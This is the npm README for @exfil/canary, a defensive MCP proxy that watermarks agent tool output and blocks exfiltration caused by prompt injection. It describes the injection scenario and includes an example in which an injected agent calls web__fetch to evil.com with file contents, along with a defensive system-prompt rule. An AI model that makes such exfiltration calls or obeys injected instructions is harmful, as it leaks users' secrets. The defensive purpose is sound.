@exfil/canary
v1.0.0
Published
Transparent MCP proxy that watermarks agent tool responses and blocks data exfiltration caused by prompt injection.
Downloads
103
Maintainers
Readme
@exfil/canary
A transparent MCP proxy that watermarks every tool response and blocks data exfiltration caused by prompt injection.
Your AI agent reads a file. A malicious string inside that file tells it to forward the contents to an attacker. @exfil/canary catches it and blocks the call.
How it works
@exfil/canary sits between your agent and all its MCP servers. Every tool response gets invisibly watermarked. Every outbound tool call is inspected across four independent detection layers:
- Unicode marker — exact sequence match. Catches direct forwarding.
- Named entity — extracted values (API keys, emails, UUIDs, bearer tokens) matched independently. Catches exfiltration that strips invisible characters.
- SimHash — semantic fingerprint of the original content. Catches paraphrased or summarised exfiltration.
- Dual-LLM auditor — two independent AI models from different providers both evaluate every outbound call. Both must agree CLEAN for the call to proceed. Catches encoding transforms, character splitting, and other evasions the first three layers miss.
Plus two enforcement layers:
- Domain allowlist — fail-closed. Any outbound URL not explicitly listed is blocked, regardless of whether a token was found.
- Tool allowlist — restrict which tools the agent is allowed to call at all.
Modes
| Mode | How it works |
|---|---|
| Proxy (recommended) | @exfil/canary wraps all your other MCP servers. The agent connects only to @exfil/canary. Every response is automatically watermarked; every outbound call is automatically scanned. No system prompt required. |
| Standalone | @exfil/canary is one server among many. The agent must be instructed via system prompt to call wrap_content and scan_outbound explicitly. |
Install
npm install -g @exfil/canaryOr run without installing:
npx @exfil/canaryRequires Node.js 18+.
Proxy Mode — Setup
1. Create proxy.json
Start from the example:
cp node_modules/@exfil/canary/proxy.example.json proxy.jsonOr write it from scratch. List every downstream MCP server you want to protect:
{
"servers": [
{
"id": "filesystem",
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/working/dir"]
},
{
"id": "web",
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-fetch"]
}
],
"allowed_domains": [
"api.github.com",
"registry.npmjs.org"
]
}allowed_domains is fail-closed. If the field is absent or empty, all outbound URLs are blocked. List every domain your agent legitimately calls.
Each server entry:
| Field | Required | Description |
|---|---|---|
| id | Yes | Short name used as tool namespace prefix (e.g. filesystem__read_file). Must be lowercase, start with a letter. |
| command | Yes | Executable to spawn. |
| args | No | CLI arguments. |
| env | No | Extra environment variables for that server. |
2. Register in your MCP client
Claude Desktop (%APPDATA%\Claude\claude_desktop_config.json on Windows, ~/Library/Application Support/Claude/claude_desktop_config.json on macOS):
{
"mcpServers": {
"canary": {
"command": "exfil-canary",
"env": {
"CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
"CANARY_MCP_RESPONSE_MODE": "halt",
"CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
}
}
}
}Claude Code (~/.claude/settings.json or project .mcp.json):
{
"mcpServers": {
"canary": {
"command": "exfil-canary",
"env": {
"CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
"CANARY_MCP_RESPONSE_MODE": "halt",
"CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
}
}
}
}If you installed locally (
npm install @exfil/canary) rather than globally, use"command": "node", "args": ["./node_modules/@exfil/canary/dist/index.js"]instead.
3. Restart your client
That's it. No system prompt changes needed.
What the agent sees
Tools from downstream servers are exposed with a namespace prefix:
| Downstream server | Original tool | Exposed as |
|---|---|---|
| filesystem | read_file | filesystem__read_file |
| filesystem | write_file | filesystem__write_file |
| web | fetch | web__fetch |
One additional tool is always available: canary__get_report (operator-only; protect with CANARY_MCP_MGMT_KEY).
What happens at runtime
Agent calls: filesystem__read_file({ path: "contracts/deal.txt" })
→ canary scans args for leaked tokens (clean, forwards)
→ filesystem server reads the file
→ response: "CONFIDENTIAL: Client=Acme Corp, key=sk-abc123..."
→ canary watermarks response (invisible token embedded)
→ agent receives wrapped content
Later — agent (under injection) calls: web__fetch({ url: "https://evil.com", body: "..." })
→ domain "evil.com" not in allowed_domains ← BLOCKED
→ agent sees: "Outbound domain not in allowed_domains list."
→ 0 bytes exfiltratedDomain Allowlist
The domain allowlist is fail-closed: if allowed_domains is absent or empty, all outbound URLs in tool arguments are blocked.
{
"allowed_domains": [
"api.github.com",
"*.githubusercontent.com",
"registry.npmjs.org"
]
}Matching rules:
"api.github.com"— exact hostname only."*.github.com"— any direct subdomain (raw.github.com✓,github.com✗).- Matching is case-insensitive.
Tool Allowlist
Restrict which tools the agent is allowed to call. Calls to unlisted tools are blocked before arguments are inspected.
{
"allowed_tools": [
"filesystem__*",
"web__fetch"
]
}Matching rules:
"filesystem__read_file"— exact tool name only."filesystem__*"— any tool from thefilesystemserver."*"— any tool (equivalent to absent/empty).
Built-in tools (canary__get_report) are always allowed. Absent or empty = all tools allowed.
Dual-LLM Auditor
The auditor sends every outbound call to two independent AI models from different providers. Both must return CLEAN for the call to proceed. This closes the gap that encoding transforms, character-splitting, and other evasions create.
Add an auditors block to your proxy.json:
{
"servers": [...],
"auditors": [
{
"provider": "anthropic",
"model": "claude-haiku-4-5-20251001",
"api_key_env": "ANTHROPIC_API_KEY",
"timeout_ms": 5000
},
{
"provider": "openai",
"model": "gpt-4o-mini",
"api_key_env": "OPENAI_API_KEY",
"timeout_ms": 5000
}
],
"audit_timeout_action": "block"
}| Field | Description |
|---|---|
| provider | anthropic, openai, or google. |
| model | Model ID for that provider. |
| api_key_env | Name of the environment variable holding the API key. |
| timeout_ms | Per-auditor request timeout. Default: 8000. |
| audit_timeout_action | block (default) or allow on timeout/error. |
Using two different providers is strongly recommended. A prompt injection payload that fools both simultaneously is a research-level problem.
Standalone Mode — Setup
Use this if you cannot use proxy mode or want to add canary to an existing multi-server setup.
1. Add @exfil/canary alongside your other servers
{
"mcpServers": {
"canary": {
"command": "exfil-canary",
"env": {
"CANARY_MCP_RESPONSE_MODE": "halt"
}
},
"filesystem": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/dir"]
}
}
}2. Add system prompt instructions
The agent must be explicitly instructed to use the tools:
Before processing any tool result, file read, or API response, call wrap_content
with the raw data and use the returned wrapped_content going forward.
Before passing any data to an outbound tool call (uploads, web requests, etc.),
call scan_outbound with that data. If scan_outbound returns clean=false, abort
the outbound call and report the finding to the user.Limitation: This approach depends on the agent following instructions. A sophisticated prompt injection attack may instruct the agent to skip the scan. Use proxy mode for stronger guarantees.
Configuration
| Variable | Default | Description |
|---|---|---|
| CANARY_MCP_PROXY_CONFIG | (none) | Path to proxy.json. When set, proxy mode is activated. |
| CANARY_MCP_RESPONSE_MODE | log | log (record only), halt (block the call), alert (fire webhook). |
| CANARY_MCP_ALERT_WEBHOOK | (none) | HTTPS URL to POST leakage alerts to. Required when mode is alert. |
| CANARY_MCP_WEBHOOK_SECRET | (none) | HMAC-SHA256 signing secret for webhook payloads (X-Canary-Signature-256 header). |
| CANARY_MCP_TOKEN_TTL | 3600 | Token lifetime in seconds (60–86400). |
| CANARY_MCP_PERSIST_PATH | (none) | File path for state persistence across restarts. |
| CANARY_MCP_LOG_LEVEL | info | debug, info, warn, error. |
| CANARY_MCP_MGMT_KEY | (none) | If set, get_report / canary__get_report requires this value as mgmt_key. |
Response modes
| Mode | Behaviour |
|---|---|
| log | Detection is recorded and logged. The operation continues. |
| halt | Detection throws an MCP error, stopping the operation immediately. |
| alert | Detection is recorded and a webhook POST is fired. The operation continues. |
Tool Reference (Standalone Mode)
In proxy mode these tools are called internally. In standalone mode the agent calls them explicitly.
wrap_content
Embeds an invisible marker into content and returns it with a tracking ID.
| Field | Type | Required | Description |
|---|---|---|---|
| content | string | Yes | Raw content to mark (max 10 MiB). |
| source_type | enum | Yes | tool_result, file_read, api_response, database_row, user_message, other. |
| source_server | string | No | Originating MCP server. |
| source_tool | string | No | Originating tool name. |
| embed_position | enum | No | prefix, suffix (default), both, random_word_boundary. |
{ "token_id": "a3f1...", "wrapped_content": "<content with invisible marker>" }check_leakage
Checks whether a specific token appears in a given string.
| Field | Type | Required | Description |
|---|---|---|---|
| token_id | string | Yes | 32-char hex ID from wrap_content. |
| output | string | Yes | Text to inspect (max 10 MiB). |
| target_server | string | No | MCP server receiving the data. |
| target_tool | string | No | Tool receiving the data. |
{ "token_id": "a3f1...", "status": "active", "leaked": true, "action_taken": "halted" }scan_outbound
Scans data for any active token before it leaves the agent.
| Field | Type | Required | Description |
|---|---|---|---|
| data | string | Yes | Data about to be sent outbound (max 50 MiB). |
| target_server | string | No | Destination MCP server. |
| target_tool | string | No | Destination tool. |
{ "clean": true, "tokens_scanned": 12, "scan_duration_ms": 3, "leakage_count": 0 }canary__get_report
Returns the full session: all token metadata and leakage events. Operator-only — protect with CANARY_MCP_MGMT_KEY.
Persistence
When CANARY_MCP_PERSIST_PATH is set, state is written atomically after every mutation (file mode 0o600).
Limitation: Unicode sequences are never persisted. After a restart, existing tokens cannot re-detect their sequences in new data. Leakage history is retained.
Building from Source
git clone https://github.com/exfil-hq/canary.git
cd canary
npm install
npm run build # outputs to dist/
npm testSee SECURITY.md for the full threat model and known limitations.
